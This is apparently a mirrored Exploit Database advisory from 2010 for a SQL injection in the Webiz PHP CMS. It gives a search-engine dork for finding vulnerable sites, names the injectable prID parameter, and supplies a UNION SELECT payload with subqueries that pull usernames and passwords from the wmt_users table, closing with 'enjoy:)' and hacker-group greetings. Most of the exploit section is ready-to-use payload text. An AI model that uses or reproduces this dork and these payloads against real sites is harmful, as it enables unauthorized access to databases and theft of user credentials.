Webiz – SQL Injection

• Exploit Database
• 128 阅读

• 作者： kannibal615
  日期： 2010-05-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12798/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94

  @@@@@@@@ @@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@ @@@@ @@@@@@@@@@ @@@ @@@@@@ @ @@@@ @@@@@@@@@ @@@@@@@ @@@@ @@ @@@@@ @@ @@ @@ @@ @@@@ @@@@@@ '' @@ @@@@@@@ @ @@@@ @@@@ @@@@@@@@@ @@ @@@ @@@@@@@@@ @@ @   VXA@HOTMAIL.FR zn@live.de VBHACKER.NET     ===========================================================================     WEBIZ SQL INJECTION VULNERABILITY     =========================================================================== ============================================================================ ABOUT ME ============================================================================ == Found By : THE PIRATOR ---> AYMEN AHMADI ==: kannibal615 ---> WALID TGS == website : www.vbhacker.net/vb == == email: vxa [at] hotmail [dot] fr ==: zn[at] live[dot] de == == == Thanks to: Pc-InSeCt / emptyzero ==: DAK / l3G3NDS / m0j4h3d ==: V!Ru$_T4ckJ3n / __MiM0__ ==: / PrideArabs / DIESEL ==: ALL VBHACKER MEMBERS == ============================================================================ INFORMATIONS ============================================================================ == Developers : www.webiz.gr == vulner : SQL INJECTION == Bug: ../wmt/webpages/index.php == Variable1: &prID= == Variable2: &apprec= == == dork : Powered by Webiz inurl:'wmt/webpages' == ============================================================================     ============================================================================ EXPLOIT ============================================================================ == ==Dork : Powered by Webiz inurl:'wmt/webpages' == ==URL: ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here] == ==Demo: http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9' == ==exploit: index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20-- == ==database : MySQL 5 == ++ == ==*** Insert This Code in THE VALID COLUMN *** ++ + ==*** CHANGE [DATABASE_NAME] *** == == == == ==USERNAME == ==(SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1) == == == ==USER PASSWORD == == (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1) == =============================================================================   enjoy:)     ==Exploit-db.com ==VBHACKER.NET/VB ==kannibal615Copyright (c) 2010